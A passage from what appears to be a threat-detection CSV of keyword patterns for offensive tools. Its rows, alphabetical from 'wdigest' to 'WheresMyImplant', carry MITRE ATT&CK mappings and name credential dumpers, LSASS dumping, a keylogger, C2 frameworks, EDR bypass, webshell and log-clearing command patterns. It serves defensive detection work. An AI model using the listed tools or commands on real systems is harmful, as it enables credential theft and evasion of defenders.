Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*wdigest/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*--wdigest-offsets *.csv *","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*WdigestOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*We had a woodoo*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*we.exe -s rssocks -d *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*weak1337/Alcatraz*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*weakpass.com/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass.com/generate*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*weakpass-main.*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*WebBrowserPassView.exe*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*WebBrowserPassView.zip*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*webclientservicescanner -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*webdavC2.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*WebDavC2-master.zip*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*webdavC2server.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*WebDeveloperSecurityChecklist*","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","5","406","59","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z" +"*web-hacking-toolkit.git*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" +"*webshell http*/tomcatwar.jsp?cmd=*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" +"*webshell_execute*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*webshell-exegol.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weevely generate *.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weevely https://*.php * id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*weird status:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*wePWNise*","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","351","107","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z" +"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*werfault_shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*werfault_silent_process_exit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*WerTrigger.exe*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" +"*WerTrigger-master*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" +"*wevtutil cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" +"*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*WfpEscalation.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*WfpTokenDup.exe -*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*wfuzz --*.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz/wordlist*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wgen.py*","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","1","96","37","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z" +"*wget *http-vuln-cve2020-5902.nse*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wget* -O les.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Wh04m1001/DFSCoerce*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*wh0amitz/BypassCredGuard*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*Wh1t3Fox/polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","946","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" +"*whatlicense-main.zip*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*whereami.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*WheresMyImplant.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 